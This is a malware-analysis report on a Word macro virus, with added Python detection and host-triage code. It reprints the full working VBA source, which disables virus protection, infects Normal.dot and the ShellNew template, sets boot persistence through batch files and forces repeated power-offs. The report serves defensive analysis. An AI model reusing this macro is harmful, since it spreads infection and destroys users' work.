Verdict: MALICIOUS
Risk Score: 168

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1505.003 Server Software Component: Web Shell
T1059 Command and Scripting Interpreter
The sample is a Microsoft Word document whose Document_Open VBA macro is a self-replicating macro virus. On open it disables Word's macro virus warning (Options.VirusProtection = False), suppresses Ctrl+Break (EnableCancelKey = wdCancelDisabled) and hides a control on the Tools menu, then copies its own source over the first code module of the Normal template and of the active document and saves both, so every document opened or created afterwards carries the infection. It reads the name of the ShellNew .doc template from the registry value HKEY_CLASSES_ROOT\.doc\Word.Document.8\ShellNew\Filename, launches Winword.exe on that file via Shell() to infect it, renames it to a random Ver_NNNN.dat and writes the new name back to the registry; the macro's own comment calls this AV stealth, since the infected template no longer has a .doc extension while Explorer's New > Microsoft Word Document still copies it. For persistence it stores copies of Normal.dot and the template under %WINDIR%\Java with obfuscated names (via a dropped Tarnkappe.bat) and writes %WINDIR%\Winstart.bat to copy them back at boot. As a payload, whenever the day of the month equals the month number it loops endlessly on Rundll32 Kernel32,SetSystemPowerState to power the machine off.
Heuristics (5)
- VBA macros detected (medium, 4 related findings) [OLE_VBA_MACROS]: Document contains VBA macro code
- Shell() call in VBA (critical) [OLE_VBA_SHELL]: Shell() call in VBA
- Document_Open macro (high) [OLE_VBA_DOCOPEN]: Document_Open macro
- VBA p-code auto-exec with execution tokens (high) [OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA (p-code) or cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches documents that carry only p-code, or whose source extraction failed, so that no visible source is available.
- Environ() call (env variable access) (low) [OLE_VBA_ENVIRON]: Environ() call (env variable access)
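A static scan over the decoded macro source that reproduces the logic behind these heuristics, as an added example (not the analyzer's own code): each rule is a regex over comment-stripped VBA, the combination of an auto-exec entry point with a Shell() call is reported on its own, and a byte-level variant covers the p-code case where no source is available. The rule ids beyond the report's own, the severity weights and the threshold are assumptions; the sample input is a constructed excerpt of the macro on this page.

```python
"""Static indicator scan of decoded VBA source, modelled on the report's
heuristics.  Added example, not the analyzer's own code: the rule ids other
than the report's own, the weights and the threshold are assumptions."""
import re
from dataclasses import dataclass

# Entry points Office runs without user interaction.
AUTOEXEC = ("Document_Open", "AutoOpen", "Document_Close", "AutoClose",
            "AutoExec", "Document_New", "AutoNew")
# Tokens that execute something or reach out (used by the p-code byte scan).
EXEC_TOKENS = ("Shell", "CreateObject", "URLDownloadToFile", "WScript.Shell")

# (rule id, severity, regex over a comment-stripped line).  The first three
# are the report's own ids; the rest are assumed names for this example.
RULES = [
    ("OLE_VBA_DOCOPEN", "high", r"\bSub\s+Document_Open\b"),
    ("OLE_VBA_SHELL", "critical", r'\bShell\b\s*["(A-Za-z]'),
    ("OLE_VBA_ENVIRON", "low", r"\bEnviron\s*\("),
    ("VBA_SELF_REPLICATION", "high", r"\bVBProject\.VBComponents\b"),
    ("VBA_DISABLE_VIRUS_PROTECTION", "high", r"\bOptions\.VirusProtection\s*=\s*False\b"),
    ("VBA_REGISTRY_VIA_PROFILESTRING", "medium", r'PrivateProfileString\s*\(\s*""\s*,\s*"HKEY_'),
    ("VBA_BATCH_DROPPER", "medium", r'\bOpen\b.*\.bat"?\s+For\s+Output\b'),
]
SEVERITY_WEIGHT = {"low": 5, "medium": 15, "high": 30, "critical": 50}  # assumed
MALICIOUS_THRESHOLD = 100  # assumed


@dataclass
class Finding:
    rule: str
    severity: str
    line_no: int
    snippet: str


def strip_comment(line: str) -> str:
    """Drop a trailing ' comment, but not an apostrophe inside a string."""
    in_str = False
    for i, ch in enumerate(line):
        if ch == '"':
            in_str = not in_str
        elif ch == "'" and not in_str:
            return line[:i]
    return line


def scan_source(src: str) -> list:
    findings = []
    for n, raw in enumerate(src.splitlines(), 1):
        code = strip_comment(raw)
        for rule, sev, pat in RULES:
            if re.search(pat, code, re.IGNORECASE):
                findings.append(Finding(rule, sev, n, raw.strip()[:60]))
    return findings


def autoexec_with_execution(findings) -> bool:
    """Auto-exec entry point plus a Shell() call in the same module."""
    rules = {f.rule for f in findings}
    return "OLE_VBA_DOCOPEN" in rules and "OLE_VBA_SHELL" in rules


def score(findings) -> int:
    # Each rule counts once, however many lines trip it.
    distinct = {f.rule: f.severity for f in findings}
    return sum(SEVERITY_WEIGHT[s] for s in distinct.values())


def verdict(findings) -> str:
    if autoexec_with_execution(findings) or score(findings) >= MALICIOUS_THRESHOLD:
        return "malicious"
    return "suspicious" if findings else "clean"


def scan_pcode_stream(data: bytes) -> dict:
    """Fallback for streams whose source could not be extracted: look for the
    tokens as ASCII or UTF-16LE byte strings, case-insensitively."""
    low = data.lower()

    def present(tok: str) -> bool:
        return any(tok.lower().encode(enc) in low for enc in ("ascii", "utf-16-le"))

    autoexec = sorted(t for t in AUTOEXEC if present(t))
    execution = sorted(t for t in EXEC_TOKENS if present(t))
    return {"autoexec": autoexec, "execution": execution,
            "hit": bool(autoexec and execution)}


# Constructed excerpt of the macro on this page (not the full artifact).
SAMPLE = r'''Attribute VB_Name = "ThisDocument"
Private Sub Document_Open()
On Error Resume Next
Options.VirusProtection = False
ShellDoc = Environ("WINDIR") & "\ShellNew\" & System.PrivateProfileString("", "HKEY_CLASSES_ROOT\.doc\Word.Document.8\ShellNew", "Filename")
Set NT = NormalTemplate.VBProject.VBComponents(1).CodeModule
NT.DeleteLines 1, NT.CountOfLines: NT.InsertLines 1, VCode
Shell Application.Path & "\Winword.exe " & ShellDoc, vbMinimizedNoFocus
'AV Stealth in: HKEY_CLASSES_ROOT\.doc\Word.Document.8\ShellNew Filename
Open "Tarnkappe.bat" For Output As #1
Shell "Tarnkappe.bat", vbHide
End Sub
'''

if __name__ == "__main__":
    fs = scan_source(SAMPLE)
    for f in fs:
        print(f"{f.severity:8} {f.rule:32} L{f.line_no}: {f.snippet}")
    print(verdict(fs), score(fs))
```

Comment stripping matters: the sample's own "'AV Stealth in: HKEY_CLASSES_ROOT\...\ShellNew" comment would otherwise be counted as a registry access, and a scanner that keys on raw substrings is trivially defeated by splitting tokens across string concatenation, which is why the p-code variant above is a fallback rather than the primary check.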
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3343 bytes |

SHA-256: 6bd02220373e28af9548082fcaf7cf1d7715d3b59ed1503349b857f9584ded8e

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
Application.EnableCancelKey = wdCancelDisabled
On Error Resume Next
Options.VirusProtection = False
Application.CommandBars("Tools").Controls(12).Visible = False
ShellDoc = Environ("WINDIR") & "\ShellNew\" & System.PrivateProfileString("", "HKEY_CLASSES_ROOT\.doc\Word.Document.8\ShellNew", "Filename")
Set NT = NormalTemplate.VBProject.VBComponents(1).CodeModule
Set AD = ActiveDocument.VBProject.VBComponents(1).CodeModule
Set TD = ThisDocument.VBProject.VBComponents(1).CodeModule
VCode = TD.Lines(1, TD.CountOfLines)
If Normal.ThisDocument.ReadOnly = 0 Then
NT.DeleteLines 1, NT.CountOfLines: NT.InsertLines 1, VCode
NormalTemplate.Save
Else
SetAttr (NormalTemplate.FullName), vbArchive
End If
If ActiveDocument.ReadOnly = 0 Then
AD.DeleteLines 1, AD.CountOfLines: AD.InsertLines 1, VCode
ActiveDocument.Save
End If
'>-- Check if we are Master Document
If UCase(ActiveDocument.FullName) = UCase(ShellDoc) Then
ActiveDocument.Save
NormalTemplate.Saved = True
Application.Quit
End If
'>-- Infect Master Document
If ND.CountOfLines > 25 Then
If GetAttr(ShellDoc) <> 0 Then
SetAttr (ShellDoc), 0
Shell Application.Path & "\Winword.exe " & ShellDoc, vbMinimizedNoFocus
End If
End If
'AV Stealth in: HKEY_CLASSES_ROOT\.doc\Word.Document.8\ShellNew Filename
Randomize Timer
chkSt = System.PrivateProfileString("", "HKEY_CLASSES_ROOT\.doc\Word.Document.8\ShellNew", "Filename")
STL = "Ver_" & Int(Rnd * 9999) & ".dat"
If UCase(chkSt) <> Right(ShellDoc, Len(ShellDoc) - 12) Then Name ShellDoc As Environ("WinDir") & "\ShellNew\" & STL
System.PrivateProfileString("", "HKEY_CLASSES_ROOT\.doc\Word.Document.8\ShellNew", "Filename") = STL
'Reincarnation:
chkSt = System.PrivateProfileString("", "HKEY_CLASSES_ROOT\.doc\Word.Document.8\ShellNew", "Filename")
FileCopy NormalTemplate.FullName, Environ("WinDir") & "\Java\X.cls" 'Copy NormalTemplate
FileCopy Environ("WINDIR") & "\ShellNew\" & chkSt, Environ("WinDir") & "\Java\Y.cls" 'Copy Winword8.doc
x = Int(Rnd * 55) + 200: y = Int(Rnd * 19) + 238: z = Int(Rnd * 30) + 21 'Random numbers
Open "Tarnkappe.bat" For Output As #1
Print #1, "ren " & Environ("WinDir") & "\Java\X.cls " & Chr(219) & Chr(x) & Chr(y) & Chr(z) & "Sub.cls"
Print #1, "ren " & Environ("WinDir") & "\Java\Y.cls " & Chr(219) & Chr(y) & Chr(z) & Chr(x) & "Sub.cls"
Print #1, "del Tarnkappe.bat"
Open Environ("WinDir") & "\Winstart.bat" For Output As #2
Print #2, "@echo off"
Print #2, "copy " & Environ("WinDir") & "\Java\" & Chr(219) & Chr(x) & Chr(y) & Chr(z) & "Sub.cls " & NormalTemplate.FullName
Print #2, "copy " & Environ("WinDir") & "\Java\" & Chr(219) & Chr(y) & Chr(z) & Chr(x) & "Sub.cls " & Environ("WinDir") & "\ShellNew\" & chkSt
Close
Shell "Tarnkappe.bat", vbHide
Eclipse:
If Day(Now) <> Month(Now) Then Exit Sub
Do
Shell Environ("WinDir") & "\Rundll32.exe Kernel32,SetSystemPowerState", vbHide 'The lord says power off
Loop
End Sub
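For the host side, an added triage routine (not part of the report) that checks the three persistence artifacts the macro leaves behind: the ShellNew Filename value under HKEY_CLASSES_ROOT\.doc\Word.Document.8\ShellNew rewritten to a Ver_NNNN.dat name, the %WINDIR%\Winstart.bat that copies the hidden backups back over Normal.dot and the ShellNew template, and the "<obfuscated chars>Sub.cls" backups under %WINDIR%\Java. Inputs are passed in as already-collected text so the check runs anywhere; the registry value, batch text and directory listing below are constructed to mirror the macro, and Chr(219) appears as "Û" on the assumption that the listing was decoded from the Windows-1252 code page.

```python
"""Host-side triage for the persistence chain the macro sets up.
Added example, not part of the report.  Collect the three inputs with
whatever tooling is at hand (reg query, type, dir) and pass them in as text."""
import re

NORMAL_TEMPLATE_NAMES = ("normal.dot", "normal.dotm")
# "copy <src> <dst>": the macro writes the Java-dir source without spaces,
# so the first token is the source and the remainder is the destination.
COPY_LINE = re.compile(r"^\s*copy\s+(\S+)\s+(.+?)\s*$", re.IGNORECASE)


def check_shellnew_value(filename_value: str) -> list:
    r"""HKCR\.doc\Word.Document.8\ShellNew\Filename should name the stock .doc
    template; the macro renames it to Ver_NNNN.dat and rewrites the value."""
    findings = []
    low = filename_value.strip().lower()
    if not low.endswith((".doc", ".dot")):
        findings.append("shellnew-filename-not-a-template")
    if re.fullmatch(r"ver_\d{1,4}\.dat", low):
        findings.append("shellnew-filename-matches-macro-pattern")
    return findings


def check_winstart(bat_text: str) -> list:
    r"""%WINDIR%\Winstart.bat runs at boot on Windows 9x; the macro uses it to
    copy its backups back over Normal.dot and the ShellNew template."""
    findings = []
    for line in bat_text.splitlines():
        m = COPY_LINE.match(line)
        if not m:
            continue
        src, dst = m.group(1), m.group(2).lower()
        if dst.endswith(NORMAL_TEMPLATE_NAMES):
            findings.append("winstart-overwrites-normal-template")
        if "\\shellnew\\" in dst:
            findings.append("winstart-overwrites-shellnew-template")
        if any(ord(c) > 127 for c in src):
            findings.append("winstart-copy-from-obfuscated-name")
    return findings


def check_java_dir(listing) -> list:
    r"""Backups are Chr(219) + three random bytes + 'Sub.cls'; %WINDIR%\Java
    has no business holding .cls files with non-ASCII names."""
    return [n for n in listing
            if n.lower().endswith("sub.cls") and any(ord(c) > 127 for c in n)]


def triage(shellnew_value: str, winstart_bat: str, java_listing) -> dict:
    report = {
        "shellnew": check_shellnew_value(shellnew_value),
        "winstart": check_winstart(winstart_bat),
        "java_backups": check_java_dir(java_listing),
    }
    hits = [k for k in ("shellnew", "winstart", "java_backups") if report[k]]
    report["verdict"] = ("infected" if len(hits) == 3
                         else "suspicious" if hits else "clean")
    return report


# Constructed inputs mirroring the macro on this page (x=200, y=247, z=37;
# names shown as decoded from Windows-1252, so Chr(219) is "\u00db").
JAVA_NAMES = ["\u00db\u00c8\u00f7%Sub.cls", "\u00db\u00f7%\u00c8Sub.cls", "Packager.exe"]
WINSTART_BAT = "\n".join([
    "@echo off",
    "copy C:\\WINDOWS\\Java\\" + JAVA_NAMES[0] + " C:\\WINDOWS\\Normal.dot",
    "copy C:\\WINDOWS\\Java\\" + JAVA_NAMES[1] + " C:\\WINDOWS\\ShellNew\\Ver_4321.dat",
])

if __name__ == "__main__":
    print(triage("Ver_4321.dat", WINSTART_BAT, JAVA_NAMES))
    print(triage("winword8.doc", "@echo off\n", ["Packager.exe"]))
```

Cleaning up means more than deleting the document: the restore chain has to be broken in order (Winstart.bat, the Java backups, the ShellNew template and the registry value, then Normal.dot), otherwise the next boot or the next New > Microsoft Word Document reinfects the machine.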